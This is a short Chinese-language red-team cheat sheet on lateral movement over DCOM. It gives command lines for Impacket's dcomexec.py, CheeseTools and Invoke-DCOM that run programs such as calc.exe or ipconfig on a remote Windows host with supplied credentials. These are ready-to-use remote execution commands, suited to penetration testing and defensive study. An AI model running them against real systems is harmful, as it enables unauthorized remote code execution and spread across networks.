DCOM
DCOM 是 COM(组件对象模型)的扩展,它允许应用程序在远程计算机上实例化和访问 COM 对象的属性和方法。
Impacket
DCOMExec.py
>dcomexec.py [-h] [-share SHARE] [-nooutput] [-ts] [-debug] [-codec CODEC] [-object [{ShellWindows,ShellBrowserWindow,MMC20}]] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-A authfile] [-keytab KEYTAB] target [command ...]
>dcomexec.py -share C$ -object MMC20 '<DOMAIN>/<USERNAME>:<PASSWORD>@<MACHINE_CIBLE>'
>dcomexec.py -share C$ -object MMC20 '<DOMAIN>/<USERNAME>:<PASSWORD>@<MACHINE_CIBLE>' 'ipconfig'
>
>python3 dcomexec.py -object MMC20 -silentcommand -debug $DOMAIN/$USER:$PASSWORD\$@$HOST 'notepad.exe'
-object MMC20 是指定我们希望实例化 MMC20.Application 对象
-silentcommand 无回显执行
CheeseTools
https://github.com/klezVirus/CheeseTools
https://klezvirus.github.io/RedTeaming/LateralMovement/LateralMovementDCOM/
-t, --target=VALUE 目标机器
-b, --binary=VALUE 二进制文件: powershell.exe
-a, --args=VALUE Arguments: -enc <blah>
-m, --method=VALUE Methods: MMC20Application, ShellWindows,
ShellBrowserWindow, ExcelDDE, VisioAddonEx,
OutlookShellEx, ExcelXLL, VisioExecLine,
OfficeMacro
-r, --reg, --registry Enable registry manipulation
-h, -?, --help Show Help
当前方法: MMC20.Application, ShellWindows, ShellBrowserWindow, ExcelDDE, VisioAddonEx, OutlookShellEx, ExcelXLL, VisioExecLine, OfficeMacro
Invoke-DCOM
https://raw.githubusercontent.com/rvrsh3ll/Misc-Powershell-Scripts/master/Invoke-DCOM.ps1
>Import-Module .\Invoke-DCOM.ps1
>Invoke-DCOM -ComputerName '10.10.10.10' -Method MMC20.Application -Command "calc.exe"
>Invoke-DCOM -ComputerName '10.10.10.10' -Method ExcelDDE -Command "calc.exe"
>Invoke-DCOM -ComputerName '10.10.10.10' -Method ServiceStart "MyService"
>Invoke-DCOM -ComputerName '10.10.10.10' -Method ShellBrowserWindow -Command "calc.exe"
>Invoke-DCOM -ComputerName '10.10.10.10' -Method ShellWindows -Command "calc.exe"
最后更新于